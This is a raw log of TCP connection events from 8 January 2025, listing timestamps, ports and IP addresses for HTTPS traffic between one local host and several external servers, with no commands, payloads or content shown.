Jan 8, 2025 10:15:10.041141987 CET	443	49704	104.21.32.1	192.168.2.7
Jan 8, 2025 10:15:10.503490925 CET	443	49704	104.21.32.1	192.168.2.7
Jan 8, 2025 10:15:10.558121920 CET	49704	443	192.168.2.7	104.21.32.1
Jan 8, 2025 10:15:10.561995983 CET	49704	443	192.168.2.7	104.21.32.1
Jan 8, 2025 10:15:10.562007904 CET	443	49704	104.21.32.1	192.168.2.7
Jan 8, 2025 10:15:10.838001966 CET	443	49704	104.21.32.1	192.168.2.7
Jan 8, 2025 10:15:10.838093042 CET	443	49704	104.21.32.1	192.168.2.7
Jan 8, 2025 10:15:10.838152885 CET	443	49704	104.21.32.1	192.168.2.7
Jan 8, 2025 10:15:10.838217020 CET	443	49704	104.21.32.1	192.168.2.7
Jan 8, 2025 10:15:10.838236094 CET	49704	443	192.168.2.7	104.21.32.1
Jan 8, 2025 10:15:10.838265896 CET	49704	443	192.168.2.7	104.21.32.1
Jan 8, 2025 10:15:10.844221115 CET	49704	443	192.168.2.7	104.21.32.1
Jan 8, 2025 10:15:10.845541954 CET	49705	443	192.168.2.7	38.143.146.102
Jan 8, 2025 10:15:10.845575094 CET	443	49705	38.143.146.102	192.168.2.7
Jan 8, 2025 10:15:10.845678091 CET	49705	443	192.168.2.7	38.143.146.102
Jan 8, 2025 10:15:10.845943928 CET	49705	443	192.168.2.7	38.143.146.102
Jan 8, 2025 10:15:10.845953941 CET	443	49705	38.143.146.102	192.168.2.7
Jan 8, 2025 10:15:11.440570116 CET	443	49705	38.143.146.102	192.168.2.7
Jan 8, 2025 10:15:11.440697908 CET	49705	443	192.168.2.7	38.143.146.102
Jan 8, 2025 10:15:11.449687004 CET	49705	443	192.168.2.7	38.143.146.102
Jan 8, 2025 10:15:11.449709892 CET	443	49705	38.143.146.102	192.168.2.7
Jan 8, 2025 10:15:11.449950933 CET	443	49705	38.143.146.102	192.168.2.7
Jan 8, 2025 10:15:11.450992107 CET	49705	443	192.168.2.7	38.143.146.102
Jan 8, 2025 10:15:11.495341063 CET	443	49705	38.143.146.102	192.168.2.7
Jan 8, 2025 10:15:11.609101057 CET	443	49705	38.143.146.102	192.168.2.7
Jan 8, 2025 10:15:11.609117985 CET	443	49705	38.143.146.102	192.168.2.7
Jan 8, 2025 10:15:11.609152079 CET	443	49705	38.143.146.102	192.168.2.7
Jan 8, 2025 10:15:11.609263897 CET	49705	443	192.168.2.7	38.143.146.102
Jan 8, 2025 10:15:11.609288931 CET	443	49705	38.143.146.102	192.168.2.7
Jan 8, 2025 10:15:11.609359026 CET	49705	443	192.168.2.7	38.143.146.102
Jan 8, 2025 10:15:11.686147928 CET	443	49705	38.143.146.102	192.168.2.7
Jan 8, 2025 10:15:11.686173916 CET	443	49705	38.143.146.102	192.168.2.7
Jan 8, 2025 10:15:11.686347961 CET	49705	443	192.168.2.7	38.143.146.102
Jan 8, 2025 10:15:11.686374903 CET	443	49705	38.143.146.102	192.168.2.7
Jan 8, 2025 10:15:11.686424017 CET	49705	443	192.168.2.7	38.143.146.102
Jan 8, 2025 10:15:11.699606895 CET	443	49705	38.143.146.102	192.168.2.7
Jan 8, 2025 10:15:11.699640989 CET	443	49705	38.143.146.102	192.168.2.7
Jan 8, 2025 10:15:11.699707985 CET	49705	443	192.168.2.7	38.143.146.102
Jan 8, 2025 10:15:11.699716091 CET	443	49705	38.143.146.102	192.168.2.7
Jan 8, 2025 10:15:11.699760914 CET	49705	443	192.168.2.7	38.143.146.102
Jan 8, 2025 10:15:11.776393890 CET	443	49705	38.143.146.102	192.168.2.7
Jan 8, 2025 10:15:11.776413918 CET	443	49705	38.143.146.102	192.168.2.7
Jan 8, 2025 10:15:11.776566029 CET	49705	443	192.168.2.7	38.143.146.102
Jan 8, 2025 10:15:11.776576996 CET	443	49705	38.143.146.102	192.168.2.7
Jan 8, 2025 10:15:11.776627064 CET	49705	443	192.168.2.7	38.143.146.102
Jan 8, 2025 10:15:11.777861118 CET	443	49705	38.143.146.102	192.168.2.7
Jan 8, 2025 10:15:11.777877092 CET	443	49705	38.143.146.102	192.168.2.7
Jan 8, 2025 10:15:11.777947903 CET	49705	443	192.168.2.7	38.143.146.102
Jan 8, 2025 10:15:11.777955055 CET	443	49705	38.143.146.102	192.168.2.7
Jan 8, 2025 10:15:11.778000116 CET	49705	443	192.168.2.7	38.143.146.102
Jan 8, 2025 10:15:11.779701948 CET	443	49705	38.143.146.102	192.168.2.7
Jan 8, 2025 10:15:11.779719114 CET	443	49705	38.143.146.102	192.168.2.7
Jan 8, 2025 10:15:11.779778957 CET	49705	443	192.168.2.7	38.143.146.102
Jan 8, 2025 10:15:11.779786110 CET	443	49705	38.143.146.102	192.168.2.7
Jan 8, 2025 10:15:11.779830933 CET	49705	443	192.168.2.7	38.143.146.102
Jan 8, 2025 10:15:11.790400028 CET	443	49705	38.143.146.102	192.168.2.7
Jan 8, 2025 10:15:11.790446997 CET	443	49705	38.143.146.102	192.168.2.7
Jan 8, 2025 10:15:11.790517092 CET	49705	443	192.168.2.7	38.143.146.102
Jan 8, 2025 10:15:11.790580034 CET	49705	443	192.168.2.7	38.143.146.102
Jan 8, 2025 10:15:11.814599037 CET	49705	443	192.168.2.7	38.143.146.102
Jan 8, 2025 10:15:23.889910936 CET	49795	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:15:23.889928102 CET	443	49795	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:23.891093016 CET	49795	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:15:23.894623041 CET	49795	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:15:23.894633055 CET	443	49795	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:24.378065109 CET	443	49795	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:24.378148079 CET	49795	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:15:24.381299019 CET	49795	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:15:24.381320000 CET	443	49795	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:24.381571054 CET	443	49795	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:24.387181044 CET	49795	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:15:24.431333065 CET	443	49795	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:24.732541084 CET	443	49795	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:24.732608080 CET	443	49795	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:24.732639074 CET	443	49795	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:24.732678890 CET	443	49795	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:24.732739925 CET	443	49795	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:24.732738972 CET	49795	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:15:24.732772112 CET	49795	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:15:24.735548973 CET	49795	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:15:24.931344032 CET	49795	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:15:32.720983982 CET	49847	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:15:32.721015930 CET	443	49847	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:32.721082926 CET	49847	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:15:32.725016117 CET	49847	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:15:32.725028038 CET	443	49847	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:32.754872084 CET	49848	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:15:32.754893064 CET	443	49848	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:32.754961014 CET	49848	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:15:32.758281946 CET	49848	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:15:32.758294106 CET	443	49848	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:32.773904085 CET	49849	443	192.168.2.7	140.82.121.3
Jan 8, 2025 10:15:32.773936987 CET	443	49849	140.82.121.3	192.168.2.7
Jan 8, 2025 10:15:32.774002075 CET	49849	443	192.168.2.7	140.82.121.3
Jan 8, 2025 10:15:32.779139996 CET	49849	443	192.168.2.7	140.82.121.3
Jan 8, 2025 10:15:32.779150963 CET	443	49849	140.82.121.3	192.168.2.7
Jan 8, 2025 10:15:33.199953079 CET	443	49847	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:33.200054884 CET	49847	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:15:33.201575041 CET	49847	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:15:33.201580048 CET	443	49847	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:33.201812983 CET	443	49847	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:33.208744049 CET	49847	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:15:33.229748964 CET	443	49848	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:33.229860067 CET	49848	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:15:33.231431961 CET	49848	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:15:33.231439114 CET	443	49848	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:33.231682062 CET	443	49848	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:33.238786936 CET	49848	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:15:33.251322031 CET	443	49847	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:33.279334068 CET	443	49848	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:33.403659105 CET	443	49849	140.82.121.3	192.168.2.7
Jan 8, 2025 10:15:33.403729916 CET	49849	443	192.168.2.7	140.82.121.3
Jan 8, 2025 10:15:33.407196999 CET	49849	443	192.168.2.7	140.82.121.3
Jan 8, 2025 10:15:33.407207012 CET	443	49849	140.82.121.3	192.168.2.7
Jan 8, 2025 10:15:33.407466888 CET	443	49849	140.82.121.3	192.168.2.7
Jan 8, 2025 10:15:33.414448977 CET	49849	443	192.168.2.7	140.82.121.3
Jan 8, 2025 10:15:33.455329895 CET	443	49849	140.82.121.3	192.168.2.7
Jan 8, 2025 10:15:33.637249947 CET	443	49848	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:33.637319088 CET	443	49848	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:33.637362957 CET	443	49848	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:33.637427092 CET	443	49848	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:33.637453079 CET	49848	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:15:33.637825012 CET	49848	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:15:33.637968063 CET	443	49847	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:33.638047934 CET	443	49847	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:33.638227940 CET	49847	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:15:33.639527082 CET	49848	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:15:33.642554045 CET	49847	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:15:33.670089006 CET	49855	443	192.168.2.7	140.82.121.3
Jan 8, 2025 10:15:33.670124054 CET	443	49855	140.82.121.3	192.168.2.7
Jan 8, 2025 10:15:33.670214891 CET	49855	443	192.168.2.7	140.82.121.3
Jan 8, 2025 10:15:33.678519964 CET	49855	443	192.168.2.7	140.82.121.3
Jan 8, 2025 10:15:33.678536892 CET	443	49855	140.82.121.3	192.168.2.7
Jan 8, 2025 10:15:33.822149992 CET	443	49849	140.82.121.3	192.168.2.7
Jan 8, 2025 10:15:33.822321892 CET	443	49849	140.82.121.3	192.168.2.7
Jan 8, 2025 10:15:33.822357893 CET	443	49849	140.82.121.3	192.168.2.7
Jan 8, 2025 10:15:33.822460890 CET	49849	443	192.168.2.7	140.82.121.3
Jan 8, 2025 10:15:33.823407888 CET	49849	443	192.168.2.7	140.82.121.3
Jan 8, 2025 10:15:33.834292889 CET	49856	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:33.834316015 CET	443	49856	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:33.834397078 CET	49856	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:33.834803104 CET	49856	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:33.834815979 CET	443	49856	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:33.879251003 CET	49859	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:15:33.879271030 CET	443	49859	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:33.879352093 CET	49859	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:15:33.883099079 CET	49859	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:15:33.883120060 CET	443	49859	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:34.296200991 CET	443	49856	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:34.296369076 CET	49856	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:34.298177958 CET	49856	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:34.298191071 CET	443	49856	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:34.298438072 CET	443	49856	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:34.302395105 CET	49856	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:34.324300051 CET	443	49855	140.82.121.3	192.168.2.7
Jan 8, 2025 10:15:34.324378014 CET	49855	443	192.168.2.7	140.82.121.3
Jan 8, 2025 10:15:34.326287031 CET	49855	443	192.168.2.7	140.82.121.3
Jan 8, 2025 10:15:34.326293945 CET	443	49855	140.82.121.3	192.168.2.7
Jan 8, 2025 10:15:34.326522112 CET	443	49855	140.82.121.3	192.168.2.7
Jan 8, 2025 10:15:34.328397036 CET	49855	443	192.168.2.7	140.82.121.3
Jan 8, 2025 10:15:34.343337059 CET	443	49856	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:34.351572990 CET	443	49859	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:34.352855921 CET	49859	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:15:34.353557110 CET	49859	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:15:34.353566885 CET	443	49859	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:34.353821993 CET	443	49859	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:34.361243010 CET	49859	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:15:34.371325970 CET	443	49855	140.82.121.3	192.168.2.7
Jan 8, 2025 10:15:34.403328896 CET	443	49859	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:34.444302082 CET	443	49856	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:34.444365025 CET	443	49856	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:34.444399118 CET	443	49856	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:34.444431067 CET	49856	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:34.444447041 CET	443	49856	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:34.444459915 CET	443	49856	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:34.444813013 CET	49856	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:34.460371017 CET	443	49859	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:34.460443974 CET	443	49859	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:34.460473061 CET	443	49859	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:34.460505009 CET	49859	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:15:34.460514069 CET	443	49859	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:34.460524082 CET	443	49859	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:34.460580111 CET	443	49859	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:34.460598946 CET	49859	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:15:34.460676908 CET	49859	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:15:34.503587008 CET	49856	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:34.541445971 CET	49863	443	192.168.2.7	140.82.121.3
Jan 8, 2025 10:15:34.541466951 CET	443	49863	140.82.121.3	192.168.2.7
Jan 8, 2025 10:15:34.541534901 CET	49863	443	192.168.2.7	140.82.121.3
Jan 8, 2025 10:15:34.541898966 CET	49863	443	192.168.2.7	140.82.121.3
Jan 8, 2025 10:15:34.541907072 CET	443	49863	140.82.121.3	192.168.2.7
Jan 8, 2025 10:15:34.569240093 CET	49859	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:15:34.747195005 CET	443	49855	140.82.121.3	192.168.2.7
Jan 8, 2025 10:15:34.747272015 CET	443	49855	140.82.121.3	192.168.2.7
Jan 8, 2025 10:15:34.747325897 CET	49855	443	192.168.2.7	140.82.121.3
Jan 8, 2025 10:15:34.747335911 CET	443	49855	140.82.121.3	192.168.2.7
Jan 8, 2025 10:15:34.747421980 CET	49855	443	192.168.2.7	140.82.121.3
Jan 8, 2025 10:15:34.747427940 CET	443	49855	140.82.121.3	192.168.2.7
Jan 8, 2025 10:15:34.747457027 CET	443	49855	140.82.121.3	192.168.2.7
Jan 8, 2025 10:15:34.747524023 CET	49855	443	192.168.2.7	140.82.121.3
Jan 8, 2025 10:15:34.748245001 CET	49855	443	192.168.2.7	140.82.121.3
Jan 8, 2025 10:15:34.751030922 CET	49869	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:34.751077890 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:34.751138926 CET	49869	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:34.751549006 CET	49869	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:34.751564980 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.160610914 CET	443	49863	140.82.121.3	192.168.2.7
Jan 8, 2025 10:15:35.162014961 CET	49863	443	192.168.2.7	140.82.121.3
Jan 8, 2025 10:15:35.162034988 CET	443	49863	140.82.121.3	192.168.2.7
Jan 8, 2025 10:15:35.222912073 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.222990990 CET	49869	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:35.224313021 CET	49869	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:35.224320889 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.224553108 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.226151943 CET	49869	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:35.267342091 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.414005041 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.414211988 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.414244890 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.414273024 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.414294958 CET	49869	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:35.414323092 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.414335966 CET	49869	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:35.422136068 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.422168970 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.422199965 CET	49869	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:35.422214985 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.422297001 CET	49869	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:35.422310114 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.422363997 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.422787905 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.422843933 CET	49869	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:35.422854900 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.422897100 CET	49869	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:35.429085970 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.469312906 CET	49869	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:35.504668951 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.504739046 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.504765987 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.504915953 CET	49869	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:35.504934072 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.505001068 CET	49869	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:35.505115032 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.505177021 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.505204916 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.505259991 CET	49869	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:35.505268097 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.505403042 CET	49869	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:35.505899906 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.505949020 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.506001949 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.506071091 CET	49869	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:35.506079912 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.506154060 CET	49869	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:35.512576103 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.512738943 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.512810946 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.512824059 CET	49869	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:35.512833118 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.512916088 CET	49869	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:35.512921095 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.512959003 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.513050079 CET	49869	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:35.513056993 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.513727903 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.513808012 CET	49869	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:35.513816118 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.519588947 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.519716978 CET	49869	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:35.519730091 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.519758940 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.519850016 CET	49869	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:35.519856930 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.563098907 CET	49869	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:35.585445881 CET	443	49863	140.82.121.3	192.168.2.7
Jan 8, 2025 10:15:35.585618973 CET	443	49863	140.82.121.3	192.168.2.7
Jan 8, 2025 10:15:35.585648060 CET	443	49863	140.82.121.3	192.168.2.7
Jan 8, 2025 10:15:35.585680008 CET	49863	443	192.168.2.7	140.82.121.3
Jan 8, 2025 10:15:35.585747004 CET	49863	443	192.168.2.7	140.82.121.3
Jan 8, 2025 10:15:35.586036921 CET	49863	443	192.168.2.7	140.82.121.3
Jan 8, 2025 10:15:35.586443901 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:35.586484909 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.586766005 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:35.586900949 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:35.586915970 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.595129967 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.595172882 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.595206976 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.595228910 CET	49869	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:35.595242977 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.595299959 CET	49869	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:35.595535040 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.595585108 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.595614910 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.595638990 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.595668077 CET	49869	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:35.595678091 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.595707893 CET	49869	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:35.596512079 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.596558094 CET	443	49869	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:35.596649885 CET	49869	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:35.596649885 CET	49869	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:35.596852064 CET	49869	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:36.039978027 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:36.061619043 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:36.061635017 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:36.198538065 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:36.200086117 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:36.200119019 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:36.200146914 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:36.200289011 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:36.200347900 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:36.200375080 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:36.202148914 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:36.206322908 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:36.206379890 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:36.206418037 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:36.206444979 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:36.206497908 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:36.206512928 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:36.206604958 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:36.214134932 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:36.214251995 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:36.214262962 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:36.287026882 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:36.287060022 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:36.287210941 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:36.287235975 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:36.287353992 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:36.287362099 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:36.287410021 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:36.287442923 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:36.287477016 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:36.287513018 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:36.287522078 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:36.287718058 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:36.288217068 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:36.288361073 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:36.288398981 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:36.288439989 CET	49875	443	192.168.2.7	185.199.111.133
